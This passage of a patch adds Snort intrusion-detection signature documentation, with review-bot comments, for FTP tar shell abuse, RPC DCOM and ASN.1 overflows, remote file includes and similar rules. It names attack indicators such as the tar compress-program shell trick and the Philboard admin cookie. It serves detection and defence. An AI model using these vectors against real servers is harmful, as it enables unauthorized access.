+
+--
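Review bot: the body is copied from 533.txt (C$) and does not describe ADMIN$: Detailed Information talks about shares "using the format %DRIVE_LETTER% + $", which ADMIN$ does not follow, and Attack Scenarios says the attacker is after "files located on the C drive" rather than the Windows system directory that ADMIN$ exposes. Rewrite both sections for ADMIN$. As in 533.txt, Corrective Action should cover TCP port 445 as well as 139, and the "-- " separator after Contributors has trailing whitespace.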
--- /dev/null
+++ b/doc/signatures/362.txt
@@ -0,0 +1,75 @@
+Rule: 
+
+--
+Sid: 362
+
+-- 
+
+Summary: 
+This event is generated when an attempt to abuse an FTP servers functionality and configuration weaknesses is attempted.
+
+-- 
+Impact:
+Serious. The attacker may have the ability to execute commands remotely within an FTP session.
+
+-- 
+Detailed Information: 
+This event is generated when an attempt to abuse the built-in archive decompression functionality of the FTP server is attempted.
+
+Some FTP servers allow the user to compress/archive files on the fly whilst they are being uploaded or downloaded. For example, the user may be able to "tar" and download an entire directory in one command simply by requesting the "directory_name.tar". Additionally, the user may be able to specify the command the "tar" archiver will use for compression (normally, "gzip", "bzip2", etc) and have an FTP server erroneously accept this command. 
+
+If this command is a shell, an interactive session will be started.  The string " --use-compress-program" is an indicator that such a parameter is being given to "tar" utility.  The attack requires an established FTP session.
+
+--
+
+Attack Scenarios: 
+An FTP-only user with no shell access can connect to a server and execute a "/bin/bash" shell via this exploit. This will present the attacker with interactive access to a system.
+
+-- 
+
+Ease of Attack: 
+Simple. The attack requires an access via FTP to the target server. In the case of an anonymous FTP connection, the attack will only permit execution of software from within the chrooted anonymous FTP home. 
+
+If the session is that of a regular FTP user, any binary or executable file can be executed. No special exploit software is required.
+
+-- 
+
+False Positives: 
+Highly unlikely, but the legitimate use of this functionality might trigger a false alarm
+
+-- 
+
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Upgrade the FTP server software to a non-vulnerable version
+
+Restrict access to the FTP server to trusted users/IP addresses, 
+
+Disallow automatic file archival
+
+Disable FTP server and use secure shell (SSH) for transferring files.
+
+--
+Contributors: 
+Original rule writer Max Vision <vision@whitehats.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS134
+
+Bugtraq:
+http://online.securityfocus.com/bid/2240
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0202
+
+--
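Review bot: the Affected Systems section is missing. The Summary "when an attempt to abuse an FTP servers functionality and configuration weaknesses is attempted" is redundant and lacks the possessive ("server's"); the first sentence of Detailed Information has the same "attempt ... is attempted" construction. The second Corrective Action item ends with a comma instead of a period, and several "-- " separators carry trailing whitespace.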
--- /dev/null
+++ b/doc/signatures/111-11.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+111-11
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+This may indicate scanning activity.
+
+--
+Detailed Information:
+The pre-processor stream4 has detected network traffic that may indicate
+a scan is in progress. In this case, indications are that a Vecna scan
+is being used to determine the operating system of the target host.
+
+A sequence of packets has been observed that use a combination of URG,
+PUSH and FIN flags being set in a certain order in the datastream.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker may utilize scanning techniques to determine possible points
+of exploitation against a host.
+
+-- 
+Ease of Attack: 
+Simple. Many scanning tools exist.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
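Review bot: Summary says the traffic "may constitute an attack" while Detailed Information describes OS fingerprinting (a Vecna scan); the Summary should say a scan so it agrees with Impact ("This may indicate scanning activity"). "pre-processor" should be "preprocessor" as in Snort's own documentation, and several "-- " separators carry trailing whitespace.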
--- /dev/null
+++ b/doc/signatures/2136.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2136
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in the Philboard ASP application. 
+
+--
+Impact:
+Possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a weakness in the Philboard ASP application. By setting a cookie value to "True" administration rights are granted to that user. The user would then gain control of the application and have access to all administration functions.
+
+This rule generates an event if the attacker makes a request for the administration page with the cookie "philboard_Admin" value set to true from a source external to the protected network.
+
+
+--
+Affected Systems:
+Any host using Philboard.
+
+--
+Attack Scenarios:
+An attacker can gain administrator access to the application by making a simple web request.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+This event may be generated by an administrator accessing the administration page from an external source.
+
+The event will also be generated if Nessus is used to scan the host for this vulnerability.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Deny access to this page from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
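Review bot: Detailed Information needs a comma after the introductory clause: "By setting a cookie value to "True", administration rights are granted to that user." The Nessus note under False Positives is a good inclusion and should stay. Additional References is empty for a named application vulnerability, and there are two consecutive blank lines before the closing separator.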
--- /dev/null
+++ b/doc/signatures/1303.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1303
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
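Review bot: "attackers choosing" in Impact needs the possessive ("attacker's choosing"), and "Web server" in Detailed Information is capitalized inconsistently with "web server" in the same paragraph. The credential-validation paragraph is the same generic text used in several other files in this patch; for a catch-all web rule that is acceptable, but Additional References should not be empty.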
--- /dev/null
+++ b/doc/signatures/100000588.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000588
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "db_export.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "db_export.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
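Review bot: The third paragraph of Detailed Information (the one about "validating the credentials of a client host") is generic CGI boilerplate that does not describe a remote file include; an analyst reading it will look for a failed login rather than for a URL in the "admin_template_path" parameter of db_export.php. Drop it or replace it with a sentence on what the rule keys on. Also in this hunk: "running ona web server" should be "running on a web server", "exploitation attempt has been attempted" is redundant, and the Sid, Affected Systems and Contributors sections lack the blank line before "--" that the other files use.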
--- /dev/null
+++ b/doc/signatures/3259.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3259
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
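Review bot: Attack Scenarios contradicts Detailed Information: the detail text says the overflow is triggered by a malformed request sent to an RPC port, while the scenario describes "a request for a file with an overly long filename via a network share", which is a different vector. Align the scenario with the RPC DCOM description. Also "Expoit code exists" should read "Exploit code exists", and Additional References is empty for a vulnerability that has a vendor bulletin; cite it the way 3004.txt cites MS04-007.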
--- /dev/null
+++ b/doc/signatures/1150.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1150
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
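Review bot: Nothing in this file says what the rule matches (which URI, script or request pattern); the Summary and Detailed Information fit any web rule, and 1757.txt later in this patch repeats the same text word for word, so sids 1150 and 1757 are indistinguishable from their documentation. State the specific access attempt the signature looks for, and fill in Additional References where a reference exists.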
--- /dev/null
+++ b/doc/signatures/2289.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2289
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
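Review bot: Attack Scenarios does not match Detailed Information in this hunk: the detail text describes PHP code execution and file inclusion through unchecked user input, while the scenario talks about supplying credentials to an authentication mechanism, which is the generic CGI template text. Describe the input the rule actually inspects. Ease of Attack ("No exploit code is required") is consistent with the file-include description, but Additional References is empty; the Bugtraq or CVE entry for Advanced Poll 2.0.2 should be cited.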
--- /dev/null
+++ b/doc/signatures/2105.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+2105
+
+--
+Summary:
+This event is generated when a remote user uses the IMAP AUTHENTICATE
+command to send a suspiciously long string to port 143 on an internal
+server. This may indicate an attempt to exploit a buffer overflow
+vulnerability in the IMAP AUTHENTICATE command. This vulnerability may
+affect other IMAP implementations.
+
+--
+Impact:
+Serious. Possible remote execution of arbitrary code, which may lead to
+a remote root compromise.
+
+--
+Detailed Information:
+When a large amount of data is sent to a vulnerable IMAP server in the
+AUTHENTICATE command, a buffer overflow condition may occur. This can
+allow the attacker to execute arbitrary code, which may allow the
+attacker to gain root access to the compromised server.
+
+--
+Affected Systems:
+	University of Washington imapd version 10.234 and earlier.
+
+--
+Attack Scenarios:
+An attacker can send a sufficiently long AUTHENTICATE command to the
+IMAP server, creating a buffer overflow condition. This can then allow
+the attacker to gain root access to the compromised server.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate patches for your operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/130
+
+CVE
+http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=CVE-1999-0005 
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=11073
+
+--
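Review bot: False Positives "None known" is doubtful for a rule that, per the Summary, fires on a suspiciously long string in the AUTHENTICATE command: legitimate authentication mechanisms that pass long encoded tokens through AUTHENTICATE would match on length alone, and the doc should say so. The Summary also states the vulnerability "may affect other IMAP implementations" while Affected Systems lists only UW imapd; either name the others or drop the claim. Minor: trailing space after the CVE URL.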
--- /dev/null
+++ b/doc/signatures/354.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+
+Rule:
+--
+Sid:
+354
+
+--
+
+Summary:
+This event is generated when an attempt is made to login anonymously 
+into an ftp server using a suspicious password (-iss@iss)
+
+--
+
+Impact:
+Possible unauthorized access. Information gathering.
+
+--
+
+Detailed Information:
+ISS Scanner is a security scanner which checks for common 
+vulnerabilities. When it detects an open ftp server, it tries to log in 
+anonymously using the password '-iss@iss'
+
+--
+
+Affected Systems:
+Machines running anonymous ftp servers.
+
+--
+
+Attack Scenarios:
+An attacker scans a range of IPs using the ISS Scanner, checking for 
+known vulnerabilities. If the scanner encounters a ftp server, it tries 
+to log in .
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+A user may be using that same password for a legitimate 
+anonymous login.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Disable anonymous FTP access.
+
+--
+
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS331
+
+--
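Review bot: The file opens with two "Rule:" headings (the first followed by "--" and a blank line, then "Rule:" again); delete the duplicated block so the file starts with the single "Rule:" / "--" / "Sid:" sequence the other files use. Also "tries to log in ." has a stray space before the period, and the "--" before Additional References carries a trailing space. False Negatives could add that detection is keyed to the literal password "-iss@iss" named in the Summary, instead of "None known".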
--- /dev/null
+++ b/doc/signatures/3004.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid:
+3004
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Microsoft implementation of the ASN.1 Library.
+
+--
+Impact:
+Serious. Execution of arbitrary code, DoS.
+
+--
+Detailed Information:
+A buffer overflow condition in the Microsoft implementation of the ASN.1 
+Library. It may be possible for an attacker to exploit this condition by 
+sending specially crafted authentication packets to a host running a 
+vulnerable operating system.
+
+When the taget system decodes the ASN.1 data, exploit code may be included 
+in the data that may be excuted on the host with system level privileges. 
+Alternatively, the malformed data may cause the service to become 
+unresponsive thus causing the DoS condition to occur.
+
+--
+Affected Systems:
+	Microsoft Windows NT
+	Microsoft Windows NT Terminal Server Edition
+	Microsoft Windows 2000
+	Microsoft Windows XP
+	Microsoft Windows 2003
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0818
+
+US-CERT
+http://www.us-cert.gov/cas/techalerts/TA04-041A.html
+
+Microsoft
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp
+
+--
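Review bot: The Attack Scenarios section is missing from this file (Affected Systems goes straight to Ease of Attack), and the references heading is "References:" where every other file uses "Additional References:"; anything that parses these documents by section heading will miss it. Also fix "taget" and "excuted" in Detailed Information, the trailing spaces after "Rule:", and the first sentence of Detailed Information, which has no verb ("A buffer overflow condition in the Microsoft implementation of the ASN.1 Library." should be "A buffer overflow condition exists in ...").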
--- /dev/null
+++ b/doc/signatures/969.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+969
+
+--
+Summary:
+This event is generated when an attempt is made to request a file by the HTTP LOCK method.
+
+--
+Impact:
+Denial of service.  Repeated successful attempts can consume all CPU resources subsequently crashing the victim server. 
+
+--
+Detailed Information:
+The WebDAV (Web Distributed Authoring and Versioning) component of Microsoft's Internet Information Services (IIS) provides extensions to the HTTP protocol allowing users to edit and manage files on the remote web server.  A specially crafted request processed by WebDAV can consume CPU resources on the web server host causing it to crash.
+
+--
+Affected Systems:
+Windows 2000 systems running IIS 5.0.
+
+--
+Attack Scenarios:
+An attacker can craft an HTTP request processed by WebDAV that exhausts CPU resources and causes the system to crash. 
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Consider using the IIS Lockdown Tool to disable WebDAV if it is not necessary.
+
+Download and install the appropriate patch mentioned in the Microsoft bulletin.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/2736
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms01-016.asp
+
+--
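Review bot: False Positives "None Known" is wrong for a rule that, per the Summary, fires on any request using the HTTP LOCK method: LOCK is a standard WebDAV method, part of the file editing and management that Detailed Information itself describes, so every legitimate WebDAV authoring client that takes a lock will trigger this event. Say so, and note that the rule is only quiet where WebDAV is not in legitimate use. Minor: Corrective Action says "the Microsoft bulletin"; name it (MS01-016 is already in the references).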
--- /dev/null
+++ b/doc/signatures/2604.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2604
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "create_mview_repgroup" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "fname" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck633.html
+
+--
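Review bot: The sentence "If you are running Oracle on a Windows server, make sure that the variable $ORACLE_PORTS is set to a value of "any"" sits inside Detailed Information and reads like an Oracle setting; it is the Snort rule variable that limits which destination ports the rule inspects, and it deserves its own paragraph saying so and why Windows needs "any". Attack Scenarios names the "fname" variable while Detailed Information only says "a parameter"; use the same name in both. Since the scenario text states the attacker must log on with a valid username and password, Ease of Attack "Simple." should mention that precondition. Grammar: "a Oracle database" should be "an Oracle database".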
--- /dev/null
+++ b/doc/signatures/2361.txt
@@ -0,0 +1,63 @@
+Rule:  
+
+--
+Sid:
+2361
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application YaBB SE.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+YaBB SE contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the variable template
+in the script news.php when making a GET or POST  request  to a 
+vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root.
+
+--
+Affected Systems:
+	YaBB SE YaBB SE 0.8
+	YaBB SE YaBB SE 1.4.1
+	YaBB SE YaBB SE 1.5 .0
+
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path to the template variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required. Exploit code exists.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
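Review bot: "privileges of the user running the webserver, usually root" in Detailed Information is incorrect and overstates the impact: web servers normally run as an unprivileged account, so included code runs as that account unless the server is misconfigured. Reword to "with the privileges of the web server account". Also in this hunk: Affected Systems repeats the vendor name ("YaBB SE YaBB SE 0.8") and has a stray space in "1.5 .0"; Ease of Attack says both "No exploit software required" and "Exploit code exists", which reads as contradictory; and "GET or POST  request  to a" has doubled spaces.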
--- /dev/null
+++ b/doc/signatures/1931.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1931
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
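Review bot: Nothing in this file says which CGI script the rule matches; the Summary, Detailed Information and Attack Scenarios are the generic CGI template (842.txt later in this patch is the same text word for word), so an analyst sees "an attempt to exploit a known vulnerability" with no way to check the request. Name the script or URI pattern and add a reference. Also "running ona web server" should be "running on a web server", and the line ending "can be exploited by the attacker." overruns the wrap width used in the rest of the file.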
--- /dev/null
+++ b/doc/signatures/100000395.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000395
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "posts.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "posts.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
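Review bot: The third Detailed Information paragraph, about validating client credentials, is CGI boilerplate that does not describe a remote file include via the "babInstallPath" parameter and should be dropped; "exploitation attempt has been attempted" is redundant; "running ona web server" is a typo. Formatting: the file begins with two blank lines and ends with one after the closing "--", unlike the other signature files in this patch.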
--- /dev/null
+++ b/doc/signatures/1356.txt
@@ -0,0 +1,48 @@
+Rule:
+
+--
+Sid:
+1350
+
+--
+Summary:
+Attempted perl access via web
+
+--
+Impact:
+Attempt to execute a perl script on a host.
+
+--
+Detailed Information:
+This is an attempt to execute a perl script on a host. Perl is a scripting language that is available on a wide variety of platforms. By default perl code runs with full access to all libraries and inbuilt commands available to the language. When combined with the access permissions of the user executing the script, the consequences of running arbitrary code can be devastating
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP transaction that includes a reference to perl in the URI.
+
+--
+Ease of Attack:
+Simple HTTP.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
